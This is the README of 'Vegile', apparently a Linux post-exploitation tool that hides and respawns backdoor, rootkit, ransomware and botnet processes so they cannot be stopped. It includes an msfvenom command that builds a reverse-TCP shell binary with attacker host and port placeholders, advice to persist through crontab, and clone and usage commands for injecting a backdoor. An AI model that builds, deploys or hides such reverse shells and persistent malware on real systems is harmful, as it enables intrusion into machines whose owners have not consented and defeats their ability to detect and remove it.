Vegile is a tool for Post exploitation Techniques in linux. Post Exploitation techniques will ensure that we maintain some level of access and can potentially lead to deeper footholds into our targets trusted network.
- If this project is very helpful to your penetration testing and u want to support me , you can give me a cup of coffee :)
This tool will set up your backdoor/rootkits when backdoor is already setup it will be hidden your specific process,unlimited your session in metasploit and transparent. Even when it is killed, it will re-run again. There will always be a procces which will run another process, so we can assume that this procces is unstopable like a Ghost in The Shell
- Right now I just tested backdoor with msfvenom command using reverse_shell and my manual backdoor for linux [ it works ] or you can use thefatrat for to help you create a simple backdoor
- msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR
- for hidden process you can use for rootkits,backdoor,ransom and botnet { sh,python,perl,exe and binary }.
- Victim target all linux distribution include ( base32 and base64 in their system )
- For get persistence you can use crontab and xinit.d into your backdoor
- this is just a simple algorithm how we can maintain our sessions and backdoor/rootkits , you can explore this
git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile
Running Vegile without any parameters will give a helpful list of the most common options. you can use command :
- Vegile -i / --inject [backdoor/rootkit]
- Vegile -u / --unlimited [backdoor/rootkit]
- Vegile -h / --help
- Thanks to allah
- Dracos Linux from Scratch Indonesia ( Awesome Penetration os ), you can see in http://dracos-linux.org/
- Bash.ID , WingkoColi , Reversing ID , IndoXploit , Backbox Indonesia , Depok Cyber Security and Indonesia Backtrack Team .
- Offensive Security for the awesome OS ( http://www.offensive-security.com/ )
- http://www.kali.org/ Kali Linux
- gianlucaborello to give a reference and some idea [ https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/ ]
- And another open sources tool in github
Note: modifications, changes, or alterations to this sourcecode is acceptable, however, any public releases utilizing this code must be approved by writen this tool ( Edo maland ).